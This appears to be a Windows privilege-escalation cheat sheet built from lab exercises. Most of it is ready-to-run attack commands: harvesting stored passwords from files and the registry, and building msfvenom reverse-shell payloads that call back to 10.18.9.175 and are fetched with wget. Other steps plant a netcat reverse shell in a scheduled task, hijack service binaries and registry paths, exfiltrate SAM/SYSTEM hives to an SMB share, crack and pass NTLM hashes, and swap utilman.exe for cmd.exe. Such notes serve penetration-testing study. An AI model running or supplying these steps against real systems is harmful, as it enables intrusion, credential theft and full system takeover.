Skip to content

Windows Privilege Escalation

Harvesting Passwords


Leftover

When installing Windows on a large number of hosts, administrators may use Windows Deployment Services. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:

  • C:\Unattend.xml
  • C:\Windows\Panther\Unattend.xml
  • C:\Windows\Panther\Unattend\Unattend.xml
  • C:\Windows\system32\sysprep.inf
  • C:\Windows\system32\sysprep\sysprep.xml

History

Whenever a user runs a command using Powershell, it gets stored into a file that keeps a memory of past commands.

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Credentials

Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials:

cmdkey /list
While you can't see the actual passwords, if you notice any credentials worth trying, you can use them with the runas command and the /savecred option, as seen below.
runas /savecred /user:admin cmd.exe

IIS Configuration

Internet Information Services (IIS) is the default web server on Windows installations. The configuration of websites on IIS is stored in a file called web.config and can store passwords for databases or configured authentication mechanisms. Depending on the installed version of IIS, we can find web.config in one of the following locations:

  • C:\inetpub\wwwroot\web.config
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

Here is a quick way to find database connection strings on the file:

type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Credentials From PuTTY

PuTTY is an SSH client commonly found on Windows systems. Instead of having to specify a connection's parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use. While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials. To retrieve the stored proxy credentials, you can search under the following registry key for ProxyPassword with the following command:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Scheduled Tasks


Overwrite task file

List scheduled task

schtasks
Show task details
schtasks /query /tn vulntask /fo list /v
Check file permission
icacls c:\tasks\schtask.bat
Check file permission
C:\PrivEsc\accesschk.exe /accepteula -quvw user c:\tasks\schtask.bat
Overwrite file
echo c:\tools\nc64.exe -e cmd.exe 10.18.9.175 4444 > C:\tasks\schtask.bat
Run task
schtasks /run /tn vulntask

Registry


AutoRuns

Query the registry for AutoRun executables

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
OR you can use Autoruns64.exe
C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
-> click on the 'Logon' tab
Using accesschk.exe, note that one of the AutoRun executables is writable by everyone
C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
Copy the reverse.exe executable you created and overwrite the AutoRun executable with it
copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y
Start a listener on Kali and then restart the Windows VM. Open up a new RDP session to trigger a reverse shell running with admin privileges.

AlwaysInstallElevated

Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.

Query registry values

C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
- To be able to exploit this vulnerability, both should be set 1 (0x1). - Otherwise, exploitation will not be possible.

Generate a malicious .msi file using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.12.153 LPORT=LOCAL_PORT -f msi -o malicious.msi
Run the installer
C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi

Passwords

The registry can be searched for keys and values that contain the word "password":

reg query HKLM /f password /t REG_SZ /s

Service


Overwrite executable file

Vulnerability: Insecure Service Executables, If the executable associated with a service has weak permissions that allow an attacker to modify or replace it, the attacker can gain the privileges of the service's account trivially.

Query the service configuration [windows-cmd]

sc qc WindowsScheduler
Check the permissions on the executable [windows-ps]
icacls C:\PROGRA~2\SYSTEM~1\WService.exe
accesschk.exe /accepteula -quvw "C:\PROGRA~2\SYSTEM~1\WService.exe"
Let's generate an exe-service payload using msfvenom and serve it through a python webserver [linux]
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -f exe-service -o rev-shell.exe
Start server [linux]
python3 -m http.server
Start listener [linux]
nc -lvp 4444
We can then pull the payload from Powershell with the following command [windows-ps]
wget http://10.18.9.175:8000/rev-shell.exe -O rev-shell.exe
Overwrite service [windows-ps]
cd C:\PROGRA~2\SYSTEM~1\
cd 'C:\Program Files (x86)\SystemScheduler'
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-shell.exe WService.exe
icacls WService.exe /grant Everyone:F
Restart the service [windows-cmd]
sc stop windowsscheduler
sc start windowsscheduler

Add executable file upper in path hierarchy

Vulnerability: Unquoted Service Paths

List services and path [windows-ps]
search for any unusual path or path where you can write access

Get-WmiObject win32_service | ?{$_.State -like 'Running'} | select Name, DisplayName, PathName

check service configuration [windows-cmd]

sc qc thmservice
Example path
C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe
Check path

  • C:\MyPrograms\Disk Sorter Enterprise\bin\
  • C:\MyPrograms\Disk Sorter Enterprise\
  • C:\MyPrograms\

Windows will search for

  • C:\MyPrograms\Disk.exe
  • C:\MyPrograms\Disk Sorter.exe
  • C:\MyPrograms\Disk Sorter Enterprise\bin\disksrs.exe

Check permission [windows-ps]

icacls c:\MyPrograms\Disk Sorter Enterprise\bin
icacls c:\MyPrograms\Disk Sorter Enterprise
icacls c:\MyPrograms
Create exploit [linux]
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -f exe-service -o rev-shell.exe
Start server [linux]
python3 -m http.server
Setup listener [linux]
netcat -lvnp 4444
We can then pull the payload from Powershell with the following command [windows-ps]
wget http://10.18.9.175:8000/rev-shell.exe -O Disk.exe
Overwrite service [windows-ps]
move C:\Users\thm-unpriv\Disk.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F
Restart the service [windows-cmd]
sc stop "disk sorter enterprise"
sc start "disk sorter enterprise"

Modified service configuration

Vulnerability: Insecure Service Permissions To Configuration

list all services [windows-ps]

Get-WmiObject win32_service | select Name, DisplayName, PathName

check service configuration

sc qc thmservice

check permissions of service [windows-ps]

  • https://docs.microsoft.com/en-us/sysinternals/downloads/accesschk
  • Open command prompt and type
  • check for SERVICE_CHANGE_CONFIG or SERVICE_ALL_ACCESS permission
    accesschk64.exe -qlc thmservice
    accesschk64.exe -wuvc thmservice
    
    Create exploit [linux]
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.9.175 LPORT=4444 -f exe-service -o rev-shell.exe
    
    Start server [linux]
    python3 -m http.server
    
    Setup listener [linux]
    netcat -lvnp 4444
    
    We can then pull the payload from Powershell with the following command [windows-ps]
    wget http://10.18.9.175:8000/rev-shell.exe -O rev-shell.exe
    
    Grant access [windows-ps]
    icacls C:\Users\thm-unpriv\rev-shell.exe /grant Everyone:F
    
    Update service configuration [windows-cmd]
    sc config THMService binPath= "C:\Users\thm-unpriv\rev-shell.exe" obj= LocalSystem
    
    Stop and start [windows-cmd]
    sc stop THMService
    sc start THMService
    

Modified service registry configuration

Vulnerability: Weak Registry Permissions

Using accesschk.exe note that the registry entry for the regsvc service is writable by the "NT AUTHORITY\INTERACTIVE" group (essentially all logged-on users)

C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc
To check that configuration you can alsow use
Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
Overwrite the ImagePath registry key to point to the reverse.exe executable you created
reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f
start listener on kali and target service on target
net start regsvc

Windows Privileges


Info

Privileges are rights that an account has to perform specific system-related tasks. These tasks can be as simple as the privilege to shut down the machine up to privileges to bypass some DACL-based access controls.

Each user has a set of assigned privileges that can be checked with the following command:

whoami /priv
From an attacker's standpoint, only those privileges that allow us to escalate in the system are of interest. You can find a comprehensive list of exploitable privileges on https://github.com/gtworek/Priv2Admin

SeBackup / SeRestore

The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place. The idea behind this privilege is to allow certain users to perform backups from a system without requiring full administrative privileges.

Having this power, an attacker can trivially escalate privileges on the system by using many techniques. The one we will look at consists of copying the SAM and SYSTEM registry hives to extract the local Administrator's password hash.

on Windows, backup the SAM and SYSTEM hashes

reg save hklm\system C:\Users\THMBackup\system.hive
reg save hklm\sam C:\Users\THMBackup\sam.hive
on Windows, send files to SMB Server on Kali
copy C:\Users\THMBackup\sam.hive \\10.18.9.175\public\
copy C:\Users\THMBackup\system.hive \\10.18.9.175\public\
on Kali, retrieve the users password hashes
/opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
admin:1001:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
admin:1001:<LM>:<NTLM>:::
crack NTLM hash
hashcat -m 1000 --force a9fdfa038c4b75ebc76dc855dd74f0da /usr/share/wordlists/rockyou.txt
on Kali, login as administrator by hash
/opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:8f81ee5558e2d1205a84d07b0e3b34f5 administrator@10.10.233.61

SeTakeOwnership

The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys, opening up many possibilities for an attacker to elevate privileges, as we could, for example, search for a service running as SYSTEM and take ownership of the service's executable.

cmd as administrator

whoami /priv
takeover the file
takeown /f C:\Windows\System32\Utilman.exe
give your user full permissions
icacls C:\Windows\System32\Utilman.exe /grant THMTakeOwnership:F
replace utilman.exe with a copy of cmd.exe
copy cmd.exe utilman.exe
triger utilman - lock screen from the start button - click on the "Ease of Access" button

Startup Applications


Add new startup application

  • Open command prompt and type
    icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    
  • From the output notice that the BUILTIN\Users group has full access ‘(F)’ to the directory
  • exploitation
    • setup lisener
    • generete reverse shell as exe file rshell.exe
    • copy rshell.exe into 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup'
    • Logoff & Login

Vulnerable software


  • dump information it can gather on installed software
    wmic product get name,version,vendor
    
  • check software in exploit.db